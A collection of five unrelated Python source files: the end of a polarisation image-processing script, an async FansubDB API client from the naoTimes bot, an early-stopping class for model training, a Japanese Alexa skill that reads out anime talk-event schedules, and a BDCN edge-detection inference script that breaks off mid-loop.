plt.show()
# kernel = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
# Ld = convolve2d(delta, kernel, mode='same', boundary='symm')
# Ld /= np.percentile(np.abs(Ld), cap)
# Ld = np.clip(Ld, -1, 1)
x_neg = np.array([[0, 0, 0],
[0, -1, 1],
[0, 0, 0]])
x_pos = np.array([[0, 0, 0],
[1, -1, 0],
[0, 0, 0]])
y_neg = np.array([[0, 0, 0],
[0, -1, 0],
[0, 1, 0]])
y_pos = np.array([[0, 1, 0],
[0, -1, 0],
[0, 0, 0]])
L = np.zeros_like(A)
# plt.imshow(medfilt2d(delta, 7))
# plt.show()
# f, ax = plt.subplots(1,4)
# cosA = np.cos(2 * A)
# sinA = np.sin(2 * A)
# ax[0].imshow(cosA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# ax[2].imshow(sinA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# filt_size = 5
# cosA = wiener(cosA, filt_size)
# sinA = wiener(sinA, filt_size)
# cosA = medfilt2d(cosA, filt_size)
# sinA = medfilt2d(sinA, filt_size)
# ax[1].imshow(cosA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# ax[3].imshow(sinA, vmin=-1, vmax=1, cmap="BlueWhiteRed")
# plt.show()
close_to_zero = np.abs(np.cos(2 * A) - 1) < 0.000005
for kernel in [x_neg, x_pos, y_neg, y_pos]:
# for kernel in [x_neg, y_neg]:
# Lsub = np.sin(convolve2d(A, kernel, mode='same', boundary='symm'))
Lsub0 = ang_diff(convolve2d(A, kernel, mode='same', boundary='symm'))
Lsub45 = ang_diff(convolve2d(A45, kernel, mode='same', boundary='symm'))
f, ax = plt.subplots(1, 5)
ax[0].imshow(Lsub0, vmin=-1, vmax=1, cmap="BlueWhiteRed")
ax[1].imshow(Lsub45, vmin=-1, vmax=1, cmap="BlueWhiteRed")
ax[2].imshow(close_to_zero)
ax[3].imshow(Lsub0 - Lsub45, cmap="BlueWhiteRed", vmin=-0.1, vmax=0.1)
Lsub = Lsub0
Lsub[close_to_zero] = Lsub45[close_to_zero]
ax[4].imshow(Lsub - Lsub0, vmin=-.1, vmax=.1, cmap="BlueWhiteRed")
# plt.show()
# cos_arr = convolve2d(cosA, kernel, mode='same', boundary='symm')
# sin_arr = convolve2d(sinA, kernel, mode='same', boundary='symm')
# Lsub = cos_arr
# Lsub[np.abs(cos_arr) < np.abs(sin_arr)] = sin_arr[np.abs(cos_arr) < np.abs(sin_arr)]
L += Lsub
# L[500,500] = 0
# L = np.sin(np.pi/2 * L)
# from scipy.special import erf, erfinv
# endpoint = 0.99999999999
# factor = erfinv(endpoint)
# L = erf(factor * L) / endpoint
plt.figure()
plt.imshow(L, cmap="BlueWhiteRed", vmin=-1, vmax=1)
# plt.show()
n, m = A.shape
# kernel = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
# L_F = fftpack.fft2(L)
# K_F = fftpack.fft2(kernel, shape=L.shape)
# f, ax = plt.subplots(1, 2)
# ax[0].imshow(np.real(L_F))
# ax[1].imshow(np.real(K_F))
# plt.show()
# U = fftpack.ifft2(L_F / K_F)
M = vispol.construct_matrix(A.shape, type='laplacian')
# M = vispol.construct_matrix(A.shape, type='lap_xy')
U = spsolve(M, L.reshape(n * m, 1)).reshape((n, m))
# U -= np.median(U)
#
# U /= 2 * np.max(np.abs(U))
# U += 0.5
#
U = (U - np.min(U)) / (np.max(U) - np.min(U))
U_enhanced = (U - np.percentile(U, 1)) / (np.percentile(U, 99) - np.percentile(U, 1))
U_enhanced = np.clip(wiener(U_enhanced, 3), 0, 1)
U = np.clip(U, 0, 1)
Ushrink = U_enhanced * (0.8 - 0.2) + 0.2
plt.figure()
A_slice = A[1000,:600]/np.pi
# A_slice[A_slice > 0.93] -= 1
# A_slice[564:] -= 1
U_slice = U[1000,:600]
slopes_A = ang_diff(np.convolve(A_slice, [-1, 1], mode='same'))
slopes_U = np.convolve(U_slice, [-1, 1], mode='same')
# A_slice = (A_slice - np.min(A_slice)) / (np.max(A_slice) - np.min(A_slice))
# U_slice = (U_slice - np.min(U_slice)) / (np.max(U_slice) - np.min(U_slice))
# A_delta = np.convolve(A_slice, [1, -1], mode='same')
# A_slice[A_delta > 0.5] -= 0.5
# A_slice[A_delta < -0.5] += 0.5
plt.plot(range(599), slopes_A[1:])
plt.plot(range(599), slopes_U[1:])
# plt.plot(range(600), slopes_A / slopes_U)
# plt.plot(range(600), np.abs(slopes_A / slopes_U))
P = 1 - np.clip(delta / np.max(delta), 0, 1)
# mask_params ={'thresh':0.4,
# 'smooth':True,
# 'morph':True}
# delta_params = {'mask_on':True, 'mask_params':mask_params}
# dmask = vispol.dmask(delta, thresh=0.3, smooth=True, morph=True)
# U *= dmask
# A += np.pi/2
RGB = vispol.IPAtoRGB(I = Ushrink, P=P, A=A, dependent="P")
f, ax = plt.subplots(1, 2)
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/U.png", U, cmap="gray")
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/U_enhanced.png", U_enhanced, cmap="gray")
# plt.imsave("C:/users/z5052714/documents/weekly_meetings/28-06-2019/RGB_rot.png", RGB)
ax[0].imshow(U_enhanced, cmap="gray")
ax[1].imshow(RGB)
# for idx, sig in enumerate([30, 20, 10, 5]):
# ax[idx + 1].imshow(U - gaussian_filter(U, sigma=sig), cmap="gray")
# ax[idx].imshow(Usig, cmap="gray")
plt.show() |
<reponame>noaione/naoTimes
"""
MIT License
Copyright (c) 2019-2021 naoTimesdev
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import asyncio
import logging
import re
from typing import Any, AnyStr, List, Optional, Tuple, Union
import aiohttp
import arrow
import orjson
from ..models import fsdb as fsdbmodel
from ..utils import AttributeDict
from ..version import __version__ as bot_version
__all__ = ("FansubDBBridge",)
class FSDBAPIError(Exception):
def __init__(self, code: int, message: AnyStr) -> None:
self.code = code
self.message = message
super().__init__(f"{code}: {message}")
class FansubDBBridge:
def __init__(
self,
username: str,
password: str,
session: aiohttp.ClientSession,
loop: asyncio.AbstractEventLoop = None,
):
self.logger = logging.getLogger("naoTimes.FansubDB")
self._outside_session = False
if session is not None:
self.session = session
self._outside_session = True
else:
self.session = aiohttp.ClientSession(
headers={
"User-Agent": f"naoTimes-FSDB/v{bot_version} (+https://github.com/noaione/naoTimes)",
}
)
self._user = username
self._pass = password
self._loop: asyncio.AbstractEventLoop = loop
if loop is None:
self._loop = asyncio.get_event_loop()
self.BASE_URL = "https://db.silveryasha.web.id"
self.BASE_API = f"{self.BASE_URL}/api"
self._method_map = {
"get": self.session.get,
"post": self.session.post,
"put": self.session.put,
"delete": self.session.delete,
}
self._token = "" # noqa: E501
self._expire = None
# self._loop.run_until_complete(self.authorize())
@property
def token_data(self):
return {"token": self._token, "expires": self._expire}
def set_token(self, token: str, expires: Optional[Union[int, float]]):
self._token = token
self._expire = expires
@staticmethod
def get_close_matches(target: str, lists: list) -> list:
"""
Find close matches from input target
Sort everything if there's more than 2 results
"""
target_compiler = re.compile("({})".format(target), re.IGNORECASE)
return [fres for fres in lists if target_compiler.search(fres["name"])]
async def close(self):
"""Close all session connection."""
if not self._outside_session:
await self.session.close()
async def request_db(self, method: str, url: str, **kwargs) -> Tuple[AnyStr, int]:
"""Request a webpage to the FansubDB website.
Might be the API or just normal page.
:param method: HTTP Method to use (GET, POST, PUT)
:type method: str
:param url: URL to fetch
:type url: str
:return: String or bytes from the webpage
:rtype: AnyStr
"""
methods = self._method_map.get(method.lower())
main_headers = kwargs.pop("headers", {})
all_headers = {"Content-Type": "application/json", "X-Requested-With": "naoTimes-FansubDB"}
if self._token:
all_headers["Authorization"] = f"Bearer {self._token}"
merged_headers = {**main_headers, **all_headers}
resp: aiohttp.ClientResponse
async with methods(url, headers=merged_headers, **kwargs) as resp:
res = await resp.text()
code = resp.status
return res, code
async def request_api(
self, method: str, endpoint: str, **kwargs
) -> Union[List[AttributeDict], AttributeDict, Any]:
url = f"{self.BASE_API}/{endpoint}"
json_data = kwargs.get("json", kwargs.get("data", None))
self.logger.info(f"{method}: request to /api/{endpoint}: {json_data}")
ret_code = 500
try:
res, code = await self.request_db(method, url, **kwargs)
ret_code = code
self.logger.debug(f"Response from {url}: {res}")
data = orjson.loads(res)
except orjson.JSONEncodeError as e:
self.logger.error(f"Failed to decode JSON response: {e}")
raise FSDBAPIError(ret_code, f"Failed to decode JSON response: {str(e)}")
except aiohttp.ClientResponseError as e:
self.logger.error(f"Failed to request {url}: {str(e)}")
raise FSDBAPIError(e.status, f"Failed to request {url}: {str(e)}")
if isinstance(data, list):
as_attr_dict = []
for item in data:
try:
as_attr_dict.append(AttributeDict(item))
except Exception:
as_attr_dict.append(item)
return as_attr_dict
try:
return AttributeDict(data)
except Exception:
return data
async def authorize(self):
"""
Authorize username and password.
"""
body = {"username": self._user, "password": <PASSWORD>}
self.logger.info(f"Authenticating FansubDB with user {self._user}")
res = await self.request_api("post", "pintusorga", json=body)
if res["type"] == "success":
self.logger.info("Successfully logged in.")
self._token = res["token"]
else:
self.logger.error("Failed to authenticate account, disabling fansubdb...")
self._token = None
async def check_expires(self):
if self._expire is None:
return
if self._token == "":
await self.authorize()
return
ctime = arrow.utcnow().int_timestamp
if ctime - 300 >= self._expire:
self.logger.info("Reauthorizing since token expired...")
await self.authorize()
async def find_id_from_mal(self, mal_id: int, dataset: list) -> int:
mid_num = len(dataset) // 2
mid_data = dataset[mid_num]
if mid_data["mal_id"] == mal_id:
return mid_data["id"]
if mid_data["mal_id"] > mal_id:
for data in dataset[:mid_num]:
if data["mal_id"] == mal_id:
return data["id"]
elif mid_data["mal_id"] < mal_id:
for data in dataset[mid_num:]:
if data["mal_id"] == mal_id:
return data["id"]
return 0
async def find_project_id(self, anime_id: int, dataset: list) -> int:
dataset.sort(key=lambda x: x["anime"]["id"])
mid_num = len(dataset) // 2
mid_data = dataset[mid_num]
if mid_data["anime"]["id"] == anime_id:
return mid_data["id"]
if mid_data["anime"]["id"] > anime_id:
for data in dataset[:mid_num]:
if data["anime"]["id"] == anime_id:
return data["id"]
elif mid_data["anime"]["id"] < anime_id:
for data in dataset[mid_num:]:
if data["anime"]["id"] == anime_id:
return data["id"]
return 0
async def fetch_animes(self) -> List[fsdbmodel.FSDBAnimeData]:
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
try:
anime_list: List[dict] = await self.request_api("get", "anime/list", headers=headers)
if isinstance(anime_list, list):
anime_list.sort(key=lambda x: x["id"])
return anime_list
else:
self.logger.error(f"Failed to get Anime list, {anime_list!r}")
return []
except FSDBAPIError as e:
self.logger.error(f"Failed to fetch anime list: {str(e)}")
return []
async def fetch_anime(self, anime_id: Union[int, str]) -> Optional[fsdbmodel.FSDBAnimeData]:
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
try:
anime_info: dict = await self.request_api("get", f"anime/list/{anime_id}", headers=headers)
if "type" in anime_info and anime_info["type"] == "error":
return None
return anime_info
except FSDBAPIError as e:
if e.code == 404:
return None
raise
async def fetch_anime_by_mal(self, mal_id: Union[int, str]) -> Optional[fsdbmodel.FSDBAnimeData]:
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
try:
anime_info = await self.request_api("get", f"anime/mal/{mal_id}", headers=headers)
if "type" in anime_info and anime_info["type"] == "error":
return None
return anime_info
except FSDBAPIError as err:
# Error, assume that it got 404'd
if err.code == 404:
return None
raise
async def import_mal(self, mal_id: int) -> Tuple[bool, Union[int, str]]:
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
body_json = {"mal_id": mal_id}
result = await self.request_api("post", "anime/list", json=body_json, headers=headers)
if result["type"] == "success":
anime_lists = await self.fetch_animes()
anime_lists.sort(key=lambda x: x["mal_id"])
fs_id = await self.find_id_from_mal(mal_id, anime_lists)
return True, fs_id
return False, result["message"]
async def fetch_fansubs(self, search_query: str = "") -> List[fsdbmodel.FSDBFansubData]:
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
fansubs_list: list = await self.request_api("get", "fansub/list", headers=headers)
if search_query.rstrip() != "":
fansubs_list = self.get_close_matches(search_query, fansubs_list)
return fansubs_list
async def fetch_anime_fansubs(
self, anime_id: Union[int, str]
) -> Tuple[List[fsdbmodel.FSDBProjectData], str]:
if isinstance(anime_id, str):
try:
anime_id = int(anime_id)
except ValueError:
return [], "Anime ID is not a valid number."
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
fansubs_list: list = await self.request_api("get", f"projek/anime/{anime_id}", headers=headers)
return fansubs_list, "Success"
async def fetch_fansub_projects(
self, fansub_id: Union[int, str]
) -> Tuple[List[fsdbmodel.FSDBProjectData], str]:
if isinstance(fansub_id, str):
try:
fansub_id = int(fansub_id)
except ValueError:
return [], "Fansub ID is not a valid number."
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
try:
project_lists: list = await self.request_api("get", f"projek/fansub/{fansub_id}", headers=headers)
if (
isinstance(project_lists, dict)
and "type" in project_lists
and project_lists["type"] == "error"
):
return [], project_lists["message"]
return project_lists, "Success"
except FSDBAPIError as err:
if err.code == 404:
return [], "Fansub ini belum ada garapan"
return [], err.message
async def add_new_project(
self, anime_id: Union[int, str], fansub_id: Union[int, str, list], status: str = "Tentatif"
) -> Tuple[bool, Union[int, str]]:
if isinstance(anime_id, str):
try:
anime_id = int(anime_id)
except ValueError:
return False, "Anime ID is not a valid number."
if isinstance(fansub_id, str):
try:
fansub_id = int(fansub_id)
except ValueError:
return False, "Fansub ID is not a valid number."
if isinstance(fansub_id, list):
try:
new_fs_id = []
for fs_id in fansub_id:
if isinstance(fansub_id, str):
try:
fs_id = int(fs_id)
except ValueError:
return False, "Fansub ID is not a valid number."
new_fs_id.append(fs_id)
fansub_id = new_fs_id
except ValueError:
return False, "Fansub ID is not a valid number."
if status not in ["Tentatif", "Jalan", "Tamat", "Drop"]:
return False, "Invalid status."
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
json_body = {
"anime_id": anime_id,
"fansub": [fansub_id] if not isinstance(fansub_id, list) else fansub_id,
"flag": None,
"type": "TV",
"subtitle": "Softsub",
"status": status,
"url": None,
"misc": None,
}
fisrt_fs_id = fansub_id if not isinstance(fansub_id, list) else fansub_id[0]
results: dict = await self.request_api("post", "projek/list", json=json_body, headers=headers)
if results["type"] == "success":
retry_count = 0
await asyncio.sleep(0.25)
while retry_count < 5:
fansub_project, _ = await self.fetch_fansub_projects(fisrt_fs_id)
project_id = await self.find_project_id(anime_id, fansub_project)
if project_id != 0:
return True, project_id
retry_count += 1
await asyncio.sleep(1)
return False, "Failed to fetch FansubDB Project ID, please contact N4O or mention him."
return False, results["message"]
async def get_project(self, project_id: Union[int, str]) -> Tuple[dict, str]:
if isinstance(project_id, str):
try:
project_id = int(project_id)
except ValueError:
return {}, "Project ID is not a valid number."
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
try:
results: dict = await self.request_api("get", f"projek/list/{project_id}", headers=headers)
if results["type"] == "error":
return None
return results
except FSDBAPIError as err:
if err.code == 404:
return None
raise
async def _internal_update_project(
self, project_id: Union[int, str], to_update: str, update_data: Optional[Union[int, str, List[int]]]
):
res = await self.get_project(project_id)
if not res:
return False, "Project not found."
headers = {"Authorization": f"Bearer {self._token}"}
json_body = {to_update: update_data}
if to_update == "status":
json_body["url"] = "https://naoti.me/fsdb-landing/"
if res.get("url") is not None:
json_body["url"] = res["url"]
results: dict = await self.request_api(
"put", f"projek/list/{project_id}", json=json_body, headers=headers
)
if results["type"] == "success":
return True, "Success"
return False, results["message"]
async def update_project(
self,
project_id: Union[int, str],
to_update: str,
update_data: Optional[Union[int, str, List[int]]],
task_mode=True,
) -> Tuple[bool, str]:
if isinstance(project_id, str):
try:
project_id = int(project_id)
except ValueError:
return False, "Project ID is not a valid number."
await self.check_expires()
if task_mode:
ctime = arrow.utcnow().int_timestamp
task_name = f"FSDB-Update-Project-{project_id}_{ctime}"
self._loop.create_task(
self._internal_update_project(project_id, to_update, update_data), name=task_name
)
return True, "Task created"
return await self._internal_update_project(project_id, to_update, update_data)
async def delete_project(self, project_id: Union[int, str]) -> Tuple[bool, str]:
if isinstance(project_id, str):
try:
project_id = int(project_id)
except ValueError:
return False, "Project ID is not a valid number."
await self.check_expires()
headers = {"Authorization": f"Bearer {self._token}"}
results: dict = await self.request_api("delete", f"projek/list/{project_id}", headers=headers)
if results["type"] == "success":
return True, "Success"
return False, results["message"]
|
# -*- coding: utf-8 -*-
"""Implementation of early stopping."""
import dataclasses
import logging
from dataclasses import dataclass
from typing import Any, Callable, List, Mapping, Optional, Union
import numpy
from .stopper import Stopper
from ..evaluation import Evaluator
from ..models.base import Model
from ..trackers import ResultTracker
from ..triples import TriplesFactory
from ..utils import fix_dataclass_init_docs
__all__ = [
'smaller_than_any_buffer_element',
'larger_than_any_buffer_element',
'EarlyStopper',
'StopperCallback',
]
logger = logging.getLogger(__name__)
def smaller_than_any_buffer_element(buffer: numpy.ndarray, result: float, delta: float = 0.) -> bool:
"""Decide if a result is better than at least one buffer element, where smaller is better.
:param buffer:
The last results to compare against (excluding the current result).
:param result:
The current result.
:param delta:
The minimum improvement.
:return:
Whether the result is at least delta better than at least one value in the buffer.
"""
worst_in_window = buffer.max()
baseline = worst_in_window - delta
return result < baseline
def larger_than_any_buffer_element(buffer: numpy.ndarray, result: float, delta: float = 0.) -> bool:
"""Decide if a result is better than at least one buffer element, where larger is better.
:param buffer:
The last results to compare against (excluding the current result).
:param result:
The current result.
:param delta:
The minimum improvement.
:return:
Whether the result is at least delta better than at least one value in the buffer.
"""
worst_in_window = buffer.min()
baseline = worst_in_window + delta
return result > baseline
StopperCallback = Callable[[Stopper, Union[int, float]], None]
@fix_dataclass_init_docs
@dataclass
class EarlyStopper(Stopper):
"""A harness for early stopping."""
#: The model
model: Model = dataclasses.field(repr=False)
#: The evaluator
evaluator: Evaluator
#: The triples to use for evaluation
evaluation_triples_factory: Optional[TriplesFactory]
#: Size of the evaluation batches
evaluation_batch_size: Optional[int] = None
#: Slice size of the evaluation batches
evaluation_slice_size: Optional[int] = None
#: The number of epochs after which the model is evaluated on validation set
frequency: int = 10
#: The number of iterations (one iteration can correspond to various epochs)
#: with no improvement after which training will be stopped.
patience: int = 2
#: The name of the metric to use
metric: str = 'hits_at_k'
#: The minimum improvement between two iterations
delta: float = 0.005
#: The metric results from all evaluations
results: List[float] = dataclasses.field(default_factory=list, repr=False)
#: A ring buffer to store the recent results
buffer: numpy.ndarray = dataclasses.field(init=False)
#: A counter for the ring buffer
number_evaluations: int = 0
#: Whether a larger value is better, or a smaller
larger_is_better: bool = True
#: The criterion. Set in the constructor based on larger_is_better
improvement_criterion: Callable[[numpy.ndarray, float, float], bool] = None
#: The result tracker
result_tracker: Optional[ResultTracker] = None
#: Callbacks when training gets continued
continue_callbacks: List[StopperCallback] = dataclasses.field(default_factory=list, repr=False)
#: Callbacks when training is stopped early
stopped_callbacks: List[StopperCallback] = dataclasses.field(default_factory=list, repr=False)
#: Did the stopper ever decide to stop?
stopped: bool = False
def __post_init__(self):
"""Run after initialization and check the metric is valid."""
# TODO: Fix this
# if all(f.name != self.metric for f in dataclasses.fields(self.evaluator.__class__)):
# raise ValueError(f'Invalid metric name: {self.metric}')
if self.evaluation_triples_factory is None:
raise ValueError('Must specify a validation_triples_factory or a dataset for using early stopping.')
if self.larger_is_better:
self.improvement_criterion = larger_than_any_buffer_element
else:
self.improvement_criterion = smaller_than_any_buffer_element
self.buffer = numpy.empty(shape=(self.patience,))
# Dummy result tracker
if self.result_tracker is None:
self.result_tracker = ResultTracker()
def should_evaluate(self, epoch: int) -> bool:
"""Decide if evaluation should be done based on the current epoch and the internal frequency."""
return 0 == ((epoch - 1) % self.frequency)
@property
def number_results(self) -> int:
"""Count the number of results stored in the early stopper."""
return len(self.results)
def should_stop(self) -> bool:
"""Evaluate on a metric and compare to past evaluations to decide if training should stop."""
# Evaluate
metric_results = self.evaluator.evaluate(
model=self.model,
mapped_triples=self.evaluation_triples_factory.mapped_triples,
use_tqdm=False,
batch_size=self.evaluation_batch_size,
slice_size=self.evaluation_slice_size,
)
# After the first evaluation pass the optimal batch and slice size is obtained and saved for re-use
self.evaluation_batch_size = self.evaluator.batch_size
self.evaluation_slice_size = self.evaluator.slice_size
self.result_tracker.log_metrics(
metrics=metric_results.to_flat_dict(),
step=self.number_evaluations,
prefix='validation',
)
result = metric_results.get_metric(self.metric)
# Only check if enough values are already collected
if self.number_evaluations >= self.patience:
# Stop if the result did not improve more than delta for patience epochs.
if not self.improvement_criterion(buffer=self.buffer, result=result, delta=self.delta):
logger.info(f'Stopping early after {self.number_evaluations} evaluations with {self.metric}={result}')
for stopped_callback in self.stopped_callbacks:
stopped_callback(self, result)
self.stopped = True
return True
# Update ring buffer
self.buffer[self.number_evaluations % self.patience] = result
self.number_evaluations += 1
# Append to history
self.results.append(result)
for continue_callback in self.continue_callbacks:
continue_callback(self, result)
return False
def get_summary_dict(self) -> Mapping[str, Any]:
"""Get a summary dict."""
return dict(
frequency=self.frequency,
patience=self.patience,
delta=self.delta,
metric=self.metric,
larger_is_better=self.larger_is_better,
results=self.results,
stopped=self.stopped,
)
|
<reponame>hisashi-ito/alexa_lambda<filename>python/anime_talk/lambda_function.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# AnimeTalkEvent Skill Lambda Function
#
# 更新履歴:
# 2018.07.14 新規作成
# 2018.07.21 修正依頼があったので修正します
#
import os
import sys
sys.path.append('./')
from scraping import Scraping
import boto3
import datetime
# セリフ一覧
WELLCOME_MSG = "アニメトークイベントお知らせスキルへようこそ。\
このスキルではアニメトークイベントをチェックできます。\
予定されているアニメトークイベントを知りたいですか? 知りたい場合は「はい」と言ってください。"
HELP_MSG = "アニメトークイベント情報を知りたい場合は、\
「イベント情報教えて」、本スキルを終了したいときは「終了」と言ってください。"
REPROMPT_MSG = "よく聞こえませんでした。イベント情報を知りたいですか?知りたい場合は「はい」と言ってください'"
BYBY_MSG = "ご利用ありがとうございました。スキルを終了します。"
class BaseSpeech:
'''
constructor
arguments:
speech_text: Alexaに喋らせたいテキスト
should_end_session: このやり取りでスキルを終了させる場合はTrue, 続けるならFalse
session_attributes: 同一セッション内での永続化情報(セッションが終わると廃棄される)
'''
def __init__(self, speech_text, should_end_session, session_attributes=None):
# セションアトリビュートの初期化
if session_attributes is None:
session_attributes = {}
# 最終的に返却するレスポンス内容。(dict)
# 各メソッドで上書き・修正していく(結構乱暴な実装というか、ライブラリが提供されていない)
self._response = {
"version": "1.0",
"sessionAttributes": session_attributes,
"response": {
"outputSpeech": {
"type": "PlainText",
"text": speech_text
},
"shouldEndSession": should_end_session
},
}
# インスタンス変数に一時変数を用意しておく
self.speech_text = speech_text
self.should_end_session = should_end_session
self.session_attributes = session_attributes
def simple_card(self, title, text=None):
if text is None:
text = self.speech_text
card = {
# シンプルカードを追加
"type": "Simple",
"title": title,
"content": text
}
# レスポインスハッシュに追加
self._response['response']['card'] = card
return self
def build(self):
# 発話を実施するときに最後にこの関数をcallする
return self._response
'''
OnSpeech
一問一解に利用する。
システムは返答をするだけで、ユーザの応答を待たない
'''
class OneSpeech(BaseSpeech):
def __init__(self, speech_text, session_attributes=None):
# speech_text と should_end_session = Trueを渡して終了
super().__init__(speech_text, True, session_attributes)
'''
QestionSpeech
発話してユーザの返事を待ちます
'''
class QuestionSpeech(BaseSpeech):
def __init__(self, speech_text, session_attributes=None):
# 会話を継続するので、should_end_sessionを False に設定しておく
super().__init__(speech_text, False, session_attributes)
def reprompt(self, text):
"""リプロンプトを追加する"""
reprompt = {
"outputSpeech": {
"type": "PlainText",
"text": text
}
}
self._response["response"]["reprompt"] = reprompt
return self
# スキル起動時
def welcome():
return QuestionSpeech(WELLCOME_MSG).reprompt(REPROMPT_MSG).build()
# スキル終了時
def bye():
return OneSpeech(BYBY_MSG).build()
# イベント情報取得
def getInfos():
# 調査するURL集合
urls = {
"阿佐ヶ谷ロフト": "http://www.loft-prj.co.jp/schedule/lofta",
"ロフトプラスワン": "http://www.loft-prj.co.jp/schedule/plusone",
}
# scraping classにURL'sを渡して__call__関数で抽出処理を実施する
return Scraping(urls)()
# 返却文字列を作成
def speak(infos):
msg = ""
for site, events in infos.items():
msg += site + "の情報についてお知らせします。"
for event in events:
day = event[0]
title = event[1]
msg += (day + " " + title + " ")
msg += " "
msg += " 情報は以上となります。ご利用ありがとうございました。"
return OneSpeech(msg).build()
# Lambdaのmain関数
def lambda_handler(event, context):
# 環境変数経由でAPP_ID を取得し、APP_IDが異なる場合は処理を終了
app_id = os.environ['APP_ID']
if event['session']['application']['applicationId'] != app_id:
raise ValueError("Invalid Application ID")
# リクエストの種類を取得
request = event["request"]
request_type = request["type"]
# LaunchRequestは、特定のインテントを提供することなく、ユーザーがスキルを呼び出すときに送信される...
# つまり、「アレクサ、ハローワールドを開いて」のようなメッセージ
# 「アレクサ、ハローワールドで挨拶しろ」と言うとこれはインテントを含むので、IntentRequestになる
if request_type == "LaunchRequest":
return welcome()
# 何らかのインテントだった場合が検出された場合
elif request_type == "IntentRequest":
intent_name = request["intent"]["name"]
if intent_name == 'AMAZON.YesIntent' or intent_name == 'AnimeTalkEventInetnt':
return speak(getInfos())
# amazon が提供する組み込みインテント(ヘルプ)
# 「ヘルプ」「どうすればいいの」「使い方を教えて」で呼ばれる、組み込みインテント
elif intent_name == 'AMAZON.HelpIntent':
return welcome()
# amazon が提供する組み込みインテント(キャンセル、ストップ)
# 「キャンセル」「取り消し」「やっぱりやめる」等で呼び出される。組み込みのインテント
elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent' or intent_name == 'AMAZON.NoIntent':
return bye()
if __name__ == '__main__' :
import json
request = {
"type": "IntentRequest",
"intent": {"name": 'AMAZON.YesIntent'}
}
event = {"request": request}
res = lambda_handler(event, {})
print(res)
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
from torch.autograd import Variable
import time
import re
import os
import sys
import cv2
import bdcn
from datasets.dataset import Data
import argparse
import cfg
from matplotlib import pyplot as plt
from os.path import splitext, join
import logging
import fnmatch
import multiprocessing as mp
def createDataList(inputDir = 'images', outputFileName='data.lst', supportedExtensions = ['png', 'jpg', 'jpeg']):
'''
Get files e.g. (png, jpg, jpeg) from an input directory. It is case insensitive to the extensions.
inputDir Input directory that contains images.
supportedExtensions Only files with supported extensions are included in the final list. Case insensitive.
Returns a list of images file names.
'''
if inputDir is None:
raise ValueError('Input directory must be set.')
if supportedExtensions is None or len(supportedExtensions) == 0:
raise ValueError('Supported extensions must be set.')
res = []
dirList = os.listdir(inputDir)
for extension in supportedExtensions:
pattern = ''
for char in extension:
pattern += ('[%s%s]' % (char.lower(), char.upper()))
res.extend(fnmatch.filter(dirList, '*.%s' % (pattern)))
out = open(join(inputDir, outputFileName), "w")
for f in res:
out.write('%s %s\n' % (f, f))
out.close()
return res
def sigmoid(x):
return 1./(1+np.exp(np.array(-1.*x)))
def forwardAll(model, args):
test_root = cfg.config_test[args.dataset]['data_root']
if(args.inputDir is not None):
test_root = args.inputDir
logging.info('Processing: %s' % test_root)
test_lst = cfg.config_test[args.dataset]['data_lst']
imageFileNames = createDataList(test_root, test_lst)
mean_bgr = np.array(cfg.config_test[args.dataset]['mean_bgr'])
test_img = Data(test_root, test_lst, mean_bgr=mean_bgr, shuffle=False, crop_padding=0, crop_size=None)
testloader = torch.utils.data.DataLoader(test_img, batch_size=1, shuffle=False, num_workers=1)
# nm = np.loadtxt(test_name_lst, dtype=str)
# print(len(testloader), len(nm))
# assert len(testloader) == len(nm)
# save_res = True
save_dir = join(test_root, args.res_dir)
if not os.path.exists(save_dir):
os.mkdir(save_dir)
if args.cuda:
model.cuda()
model.eval()
# data_iter = iter(testloader)
# iter_per_epoch = len(testloader)
start_time = time.time()
all_t = 0
timeRecords = open(join(save_dir, 'timeRecords.txt'), "w")
timeRecords.write('# filename time[ms]\n')
for i, (data, _) in enumerate(testloader):
if args.cuda:
data = data.cuda()
with torch.no_grad():
data = Variable(data)#, volatile=True)
tm = time.time()
out = model(data)
fuse = torch.sigmoid(out[-1]).cpu().data.numpy()[0, 0, :, :]
elapsedTime = time.time() - tm
timeRecords.write('%s %f\n'%(imageFileNames[i], elapsedTime * 1000))
cv2.imwrite(os.path.join(save_dir, '%s' % imageFileNames[i]), fuse*255)
all_t += time.time() - tm
timeRecords.close()
print(all_t)
print('Overall Time use: ', time.time() - start_time)
def main():
inputDir = ['images']
args = parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
logging.info('Loading model...')
model = bdcn.BDCN()
logging.info('Loading state...')
model.load_state_dict(torch.load('%s' % (args.model)))
logging.info('Start image processing...')
for inputDir in inputDir:
